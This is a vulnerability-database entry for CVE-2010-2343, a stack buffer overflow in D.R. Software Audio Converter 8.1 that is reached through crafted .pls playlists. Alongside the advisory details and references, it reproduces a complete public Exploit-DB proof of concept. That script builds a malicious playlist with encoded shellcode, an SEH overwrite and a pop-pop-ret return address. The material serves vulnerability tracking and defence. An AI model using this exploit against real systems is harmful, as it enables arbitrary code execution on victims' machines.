CVE-2010-2343
critical
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
Stack-based buffer overflow in D.R. Software Audio Converter 8.1, 2007, and 8.05 allows remote attackers to execute arbitrary code via a crafted pls playlist file.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Audio Converter 8.1 - Local Stack Buffer Overflow
#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Date : 16/05/2010
# Author : Sud0
# Bug found by : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for .... \n";
import socket
#shellcode running calc.exe alpha2 encoded basereg edx
shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"
junk="B" * (4432 - len(shell)) #seh overwritten after 4432 bytes
nseh= "\xEB\x06\xEB\x06" # jmp forward
seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv
align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx
buffer= shell + junk + nseh + seh + "\x90" * 20 + align + "A"* 10000# added some nops after seh
mefile = open('poc.pls','w');
mefile.write(buffer);
mefile.close()Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM
Source code queued for fetch โ refresh in a moment.
Easy CD-DA Recorder - '.pls' Local Buffer Overflow (Metasploit)
Source code queued for fetch โ refresh in a moment.
Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)
Source code queued for fetch โ refresh in a moment.
Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| dennisre | audio_converter | 8.1 | |
| dennisre | audio_converter | 8.05 | |
| dennisre | audio_converter | 2007 | |
References
- http://osvdb.org/65256
- http://secunia.com/advisories/40081
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-048-d-r-software-multiple-products/
- http://www.exploit-db.com/exploits/13760
- http://www.exploit-db.com/exploits/13763
- http://www.securityfocus.com/bid/40618
- http://www.securityfocus.com/bid/40631
- http://www.vupen.com/english/advisories/2010/1387
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59206
- http://osvdb.org/65256
- http://secunia.com/advisories/40081
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-048-d-r-software-multiple-products/
- http://www.exploit-db.com/exploits/13760
- http://www.exploit-db.com/exploits/13763
- http://www.securityfocus.com/bid/40618
- http://www.securityfocus.com/bid/40631
- http://www.vupen.com/english/advisories/2010/1387
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59206
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.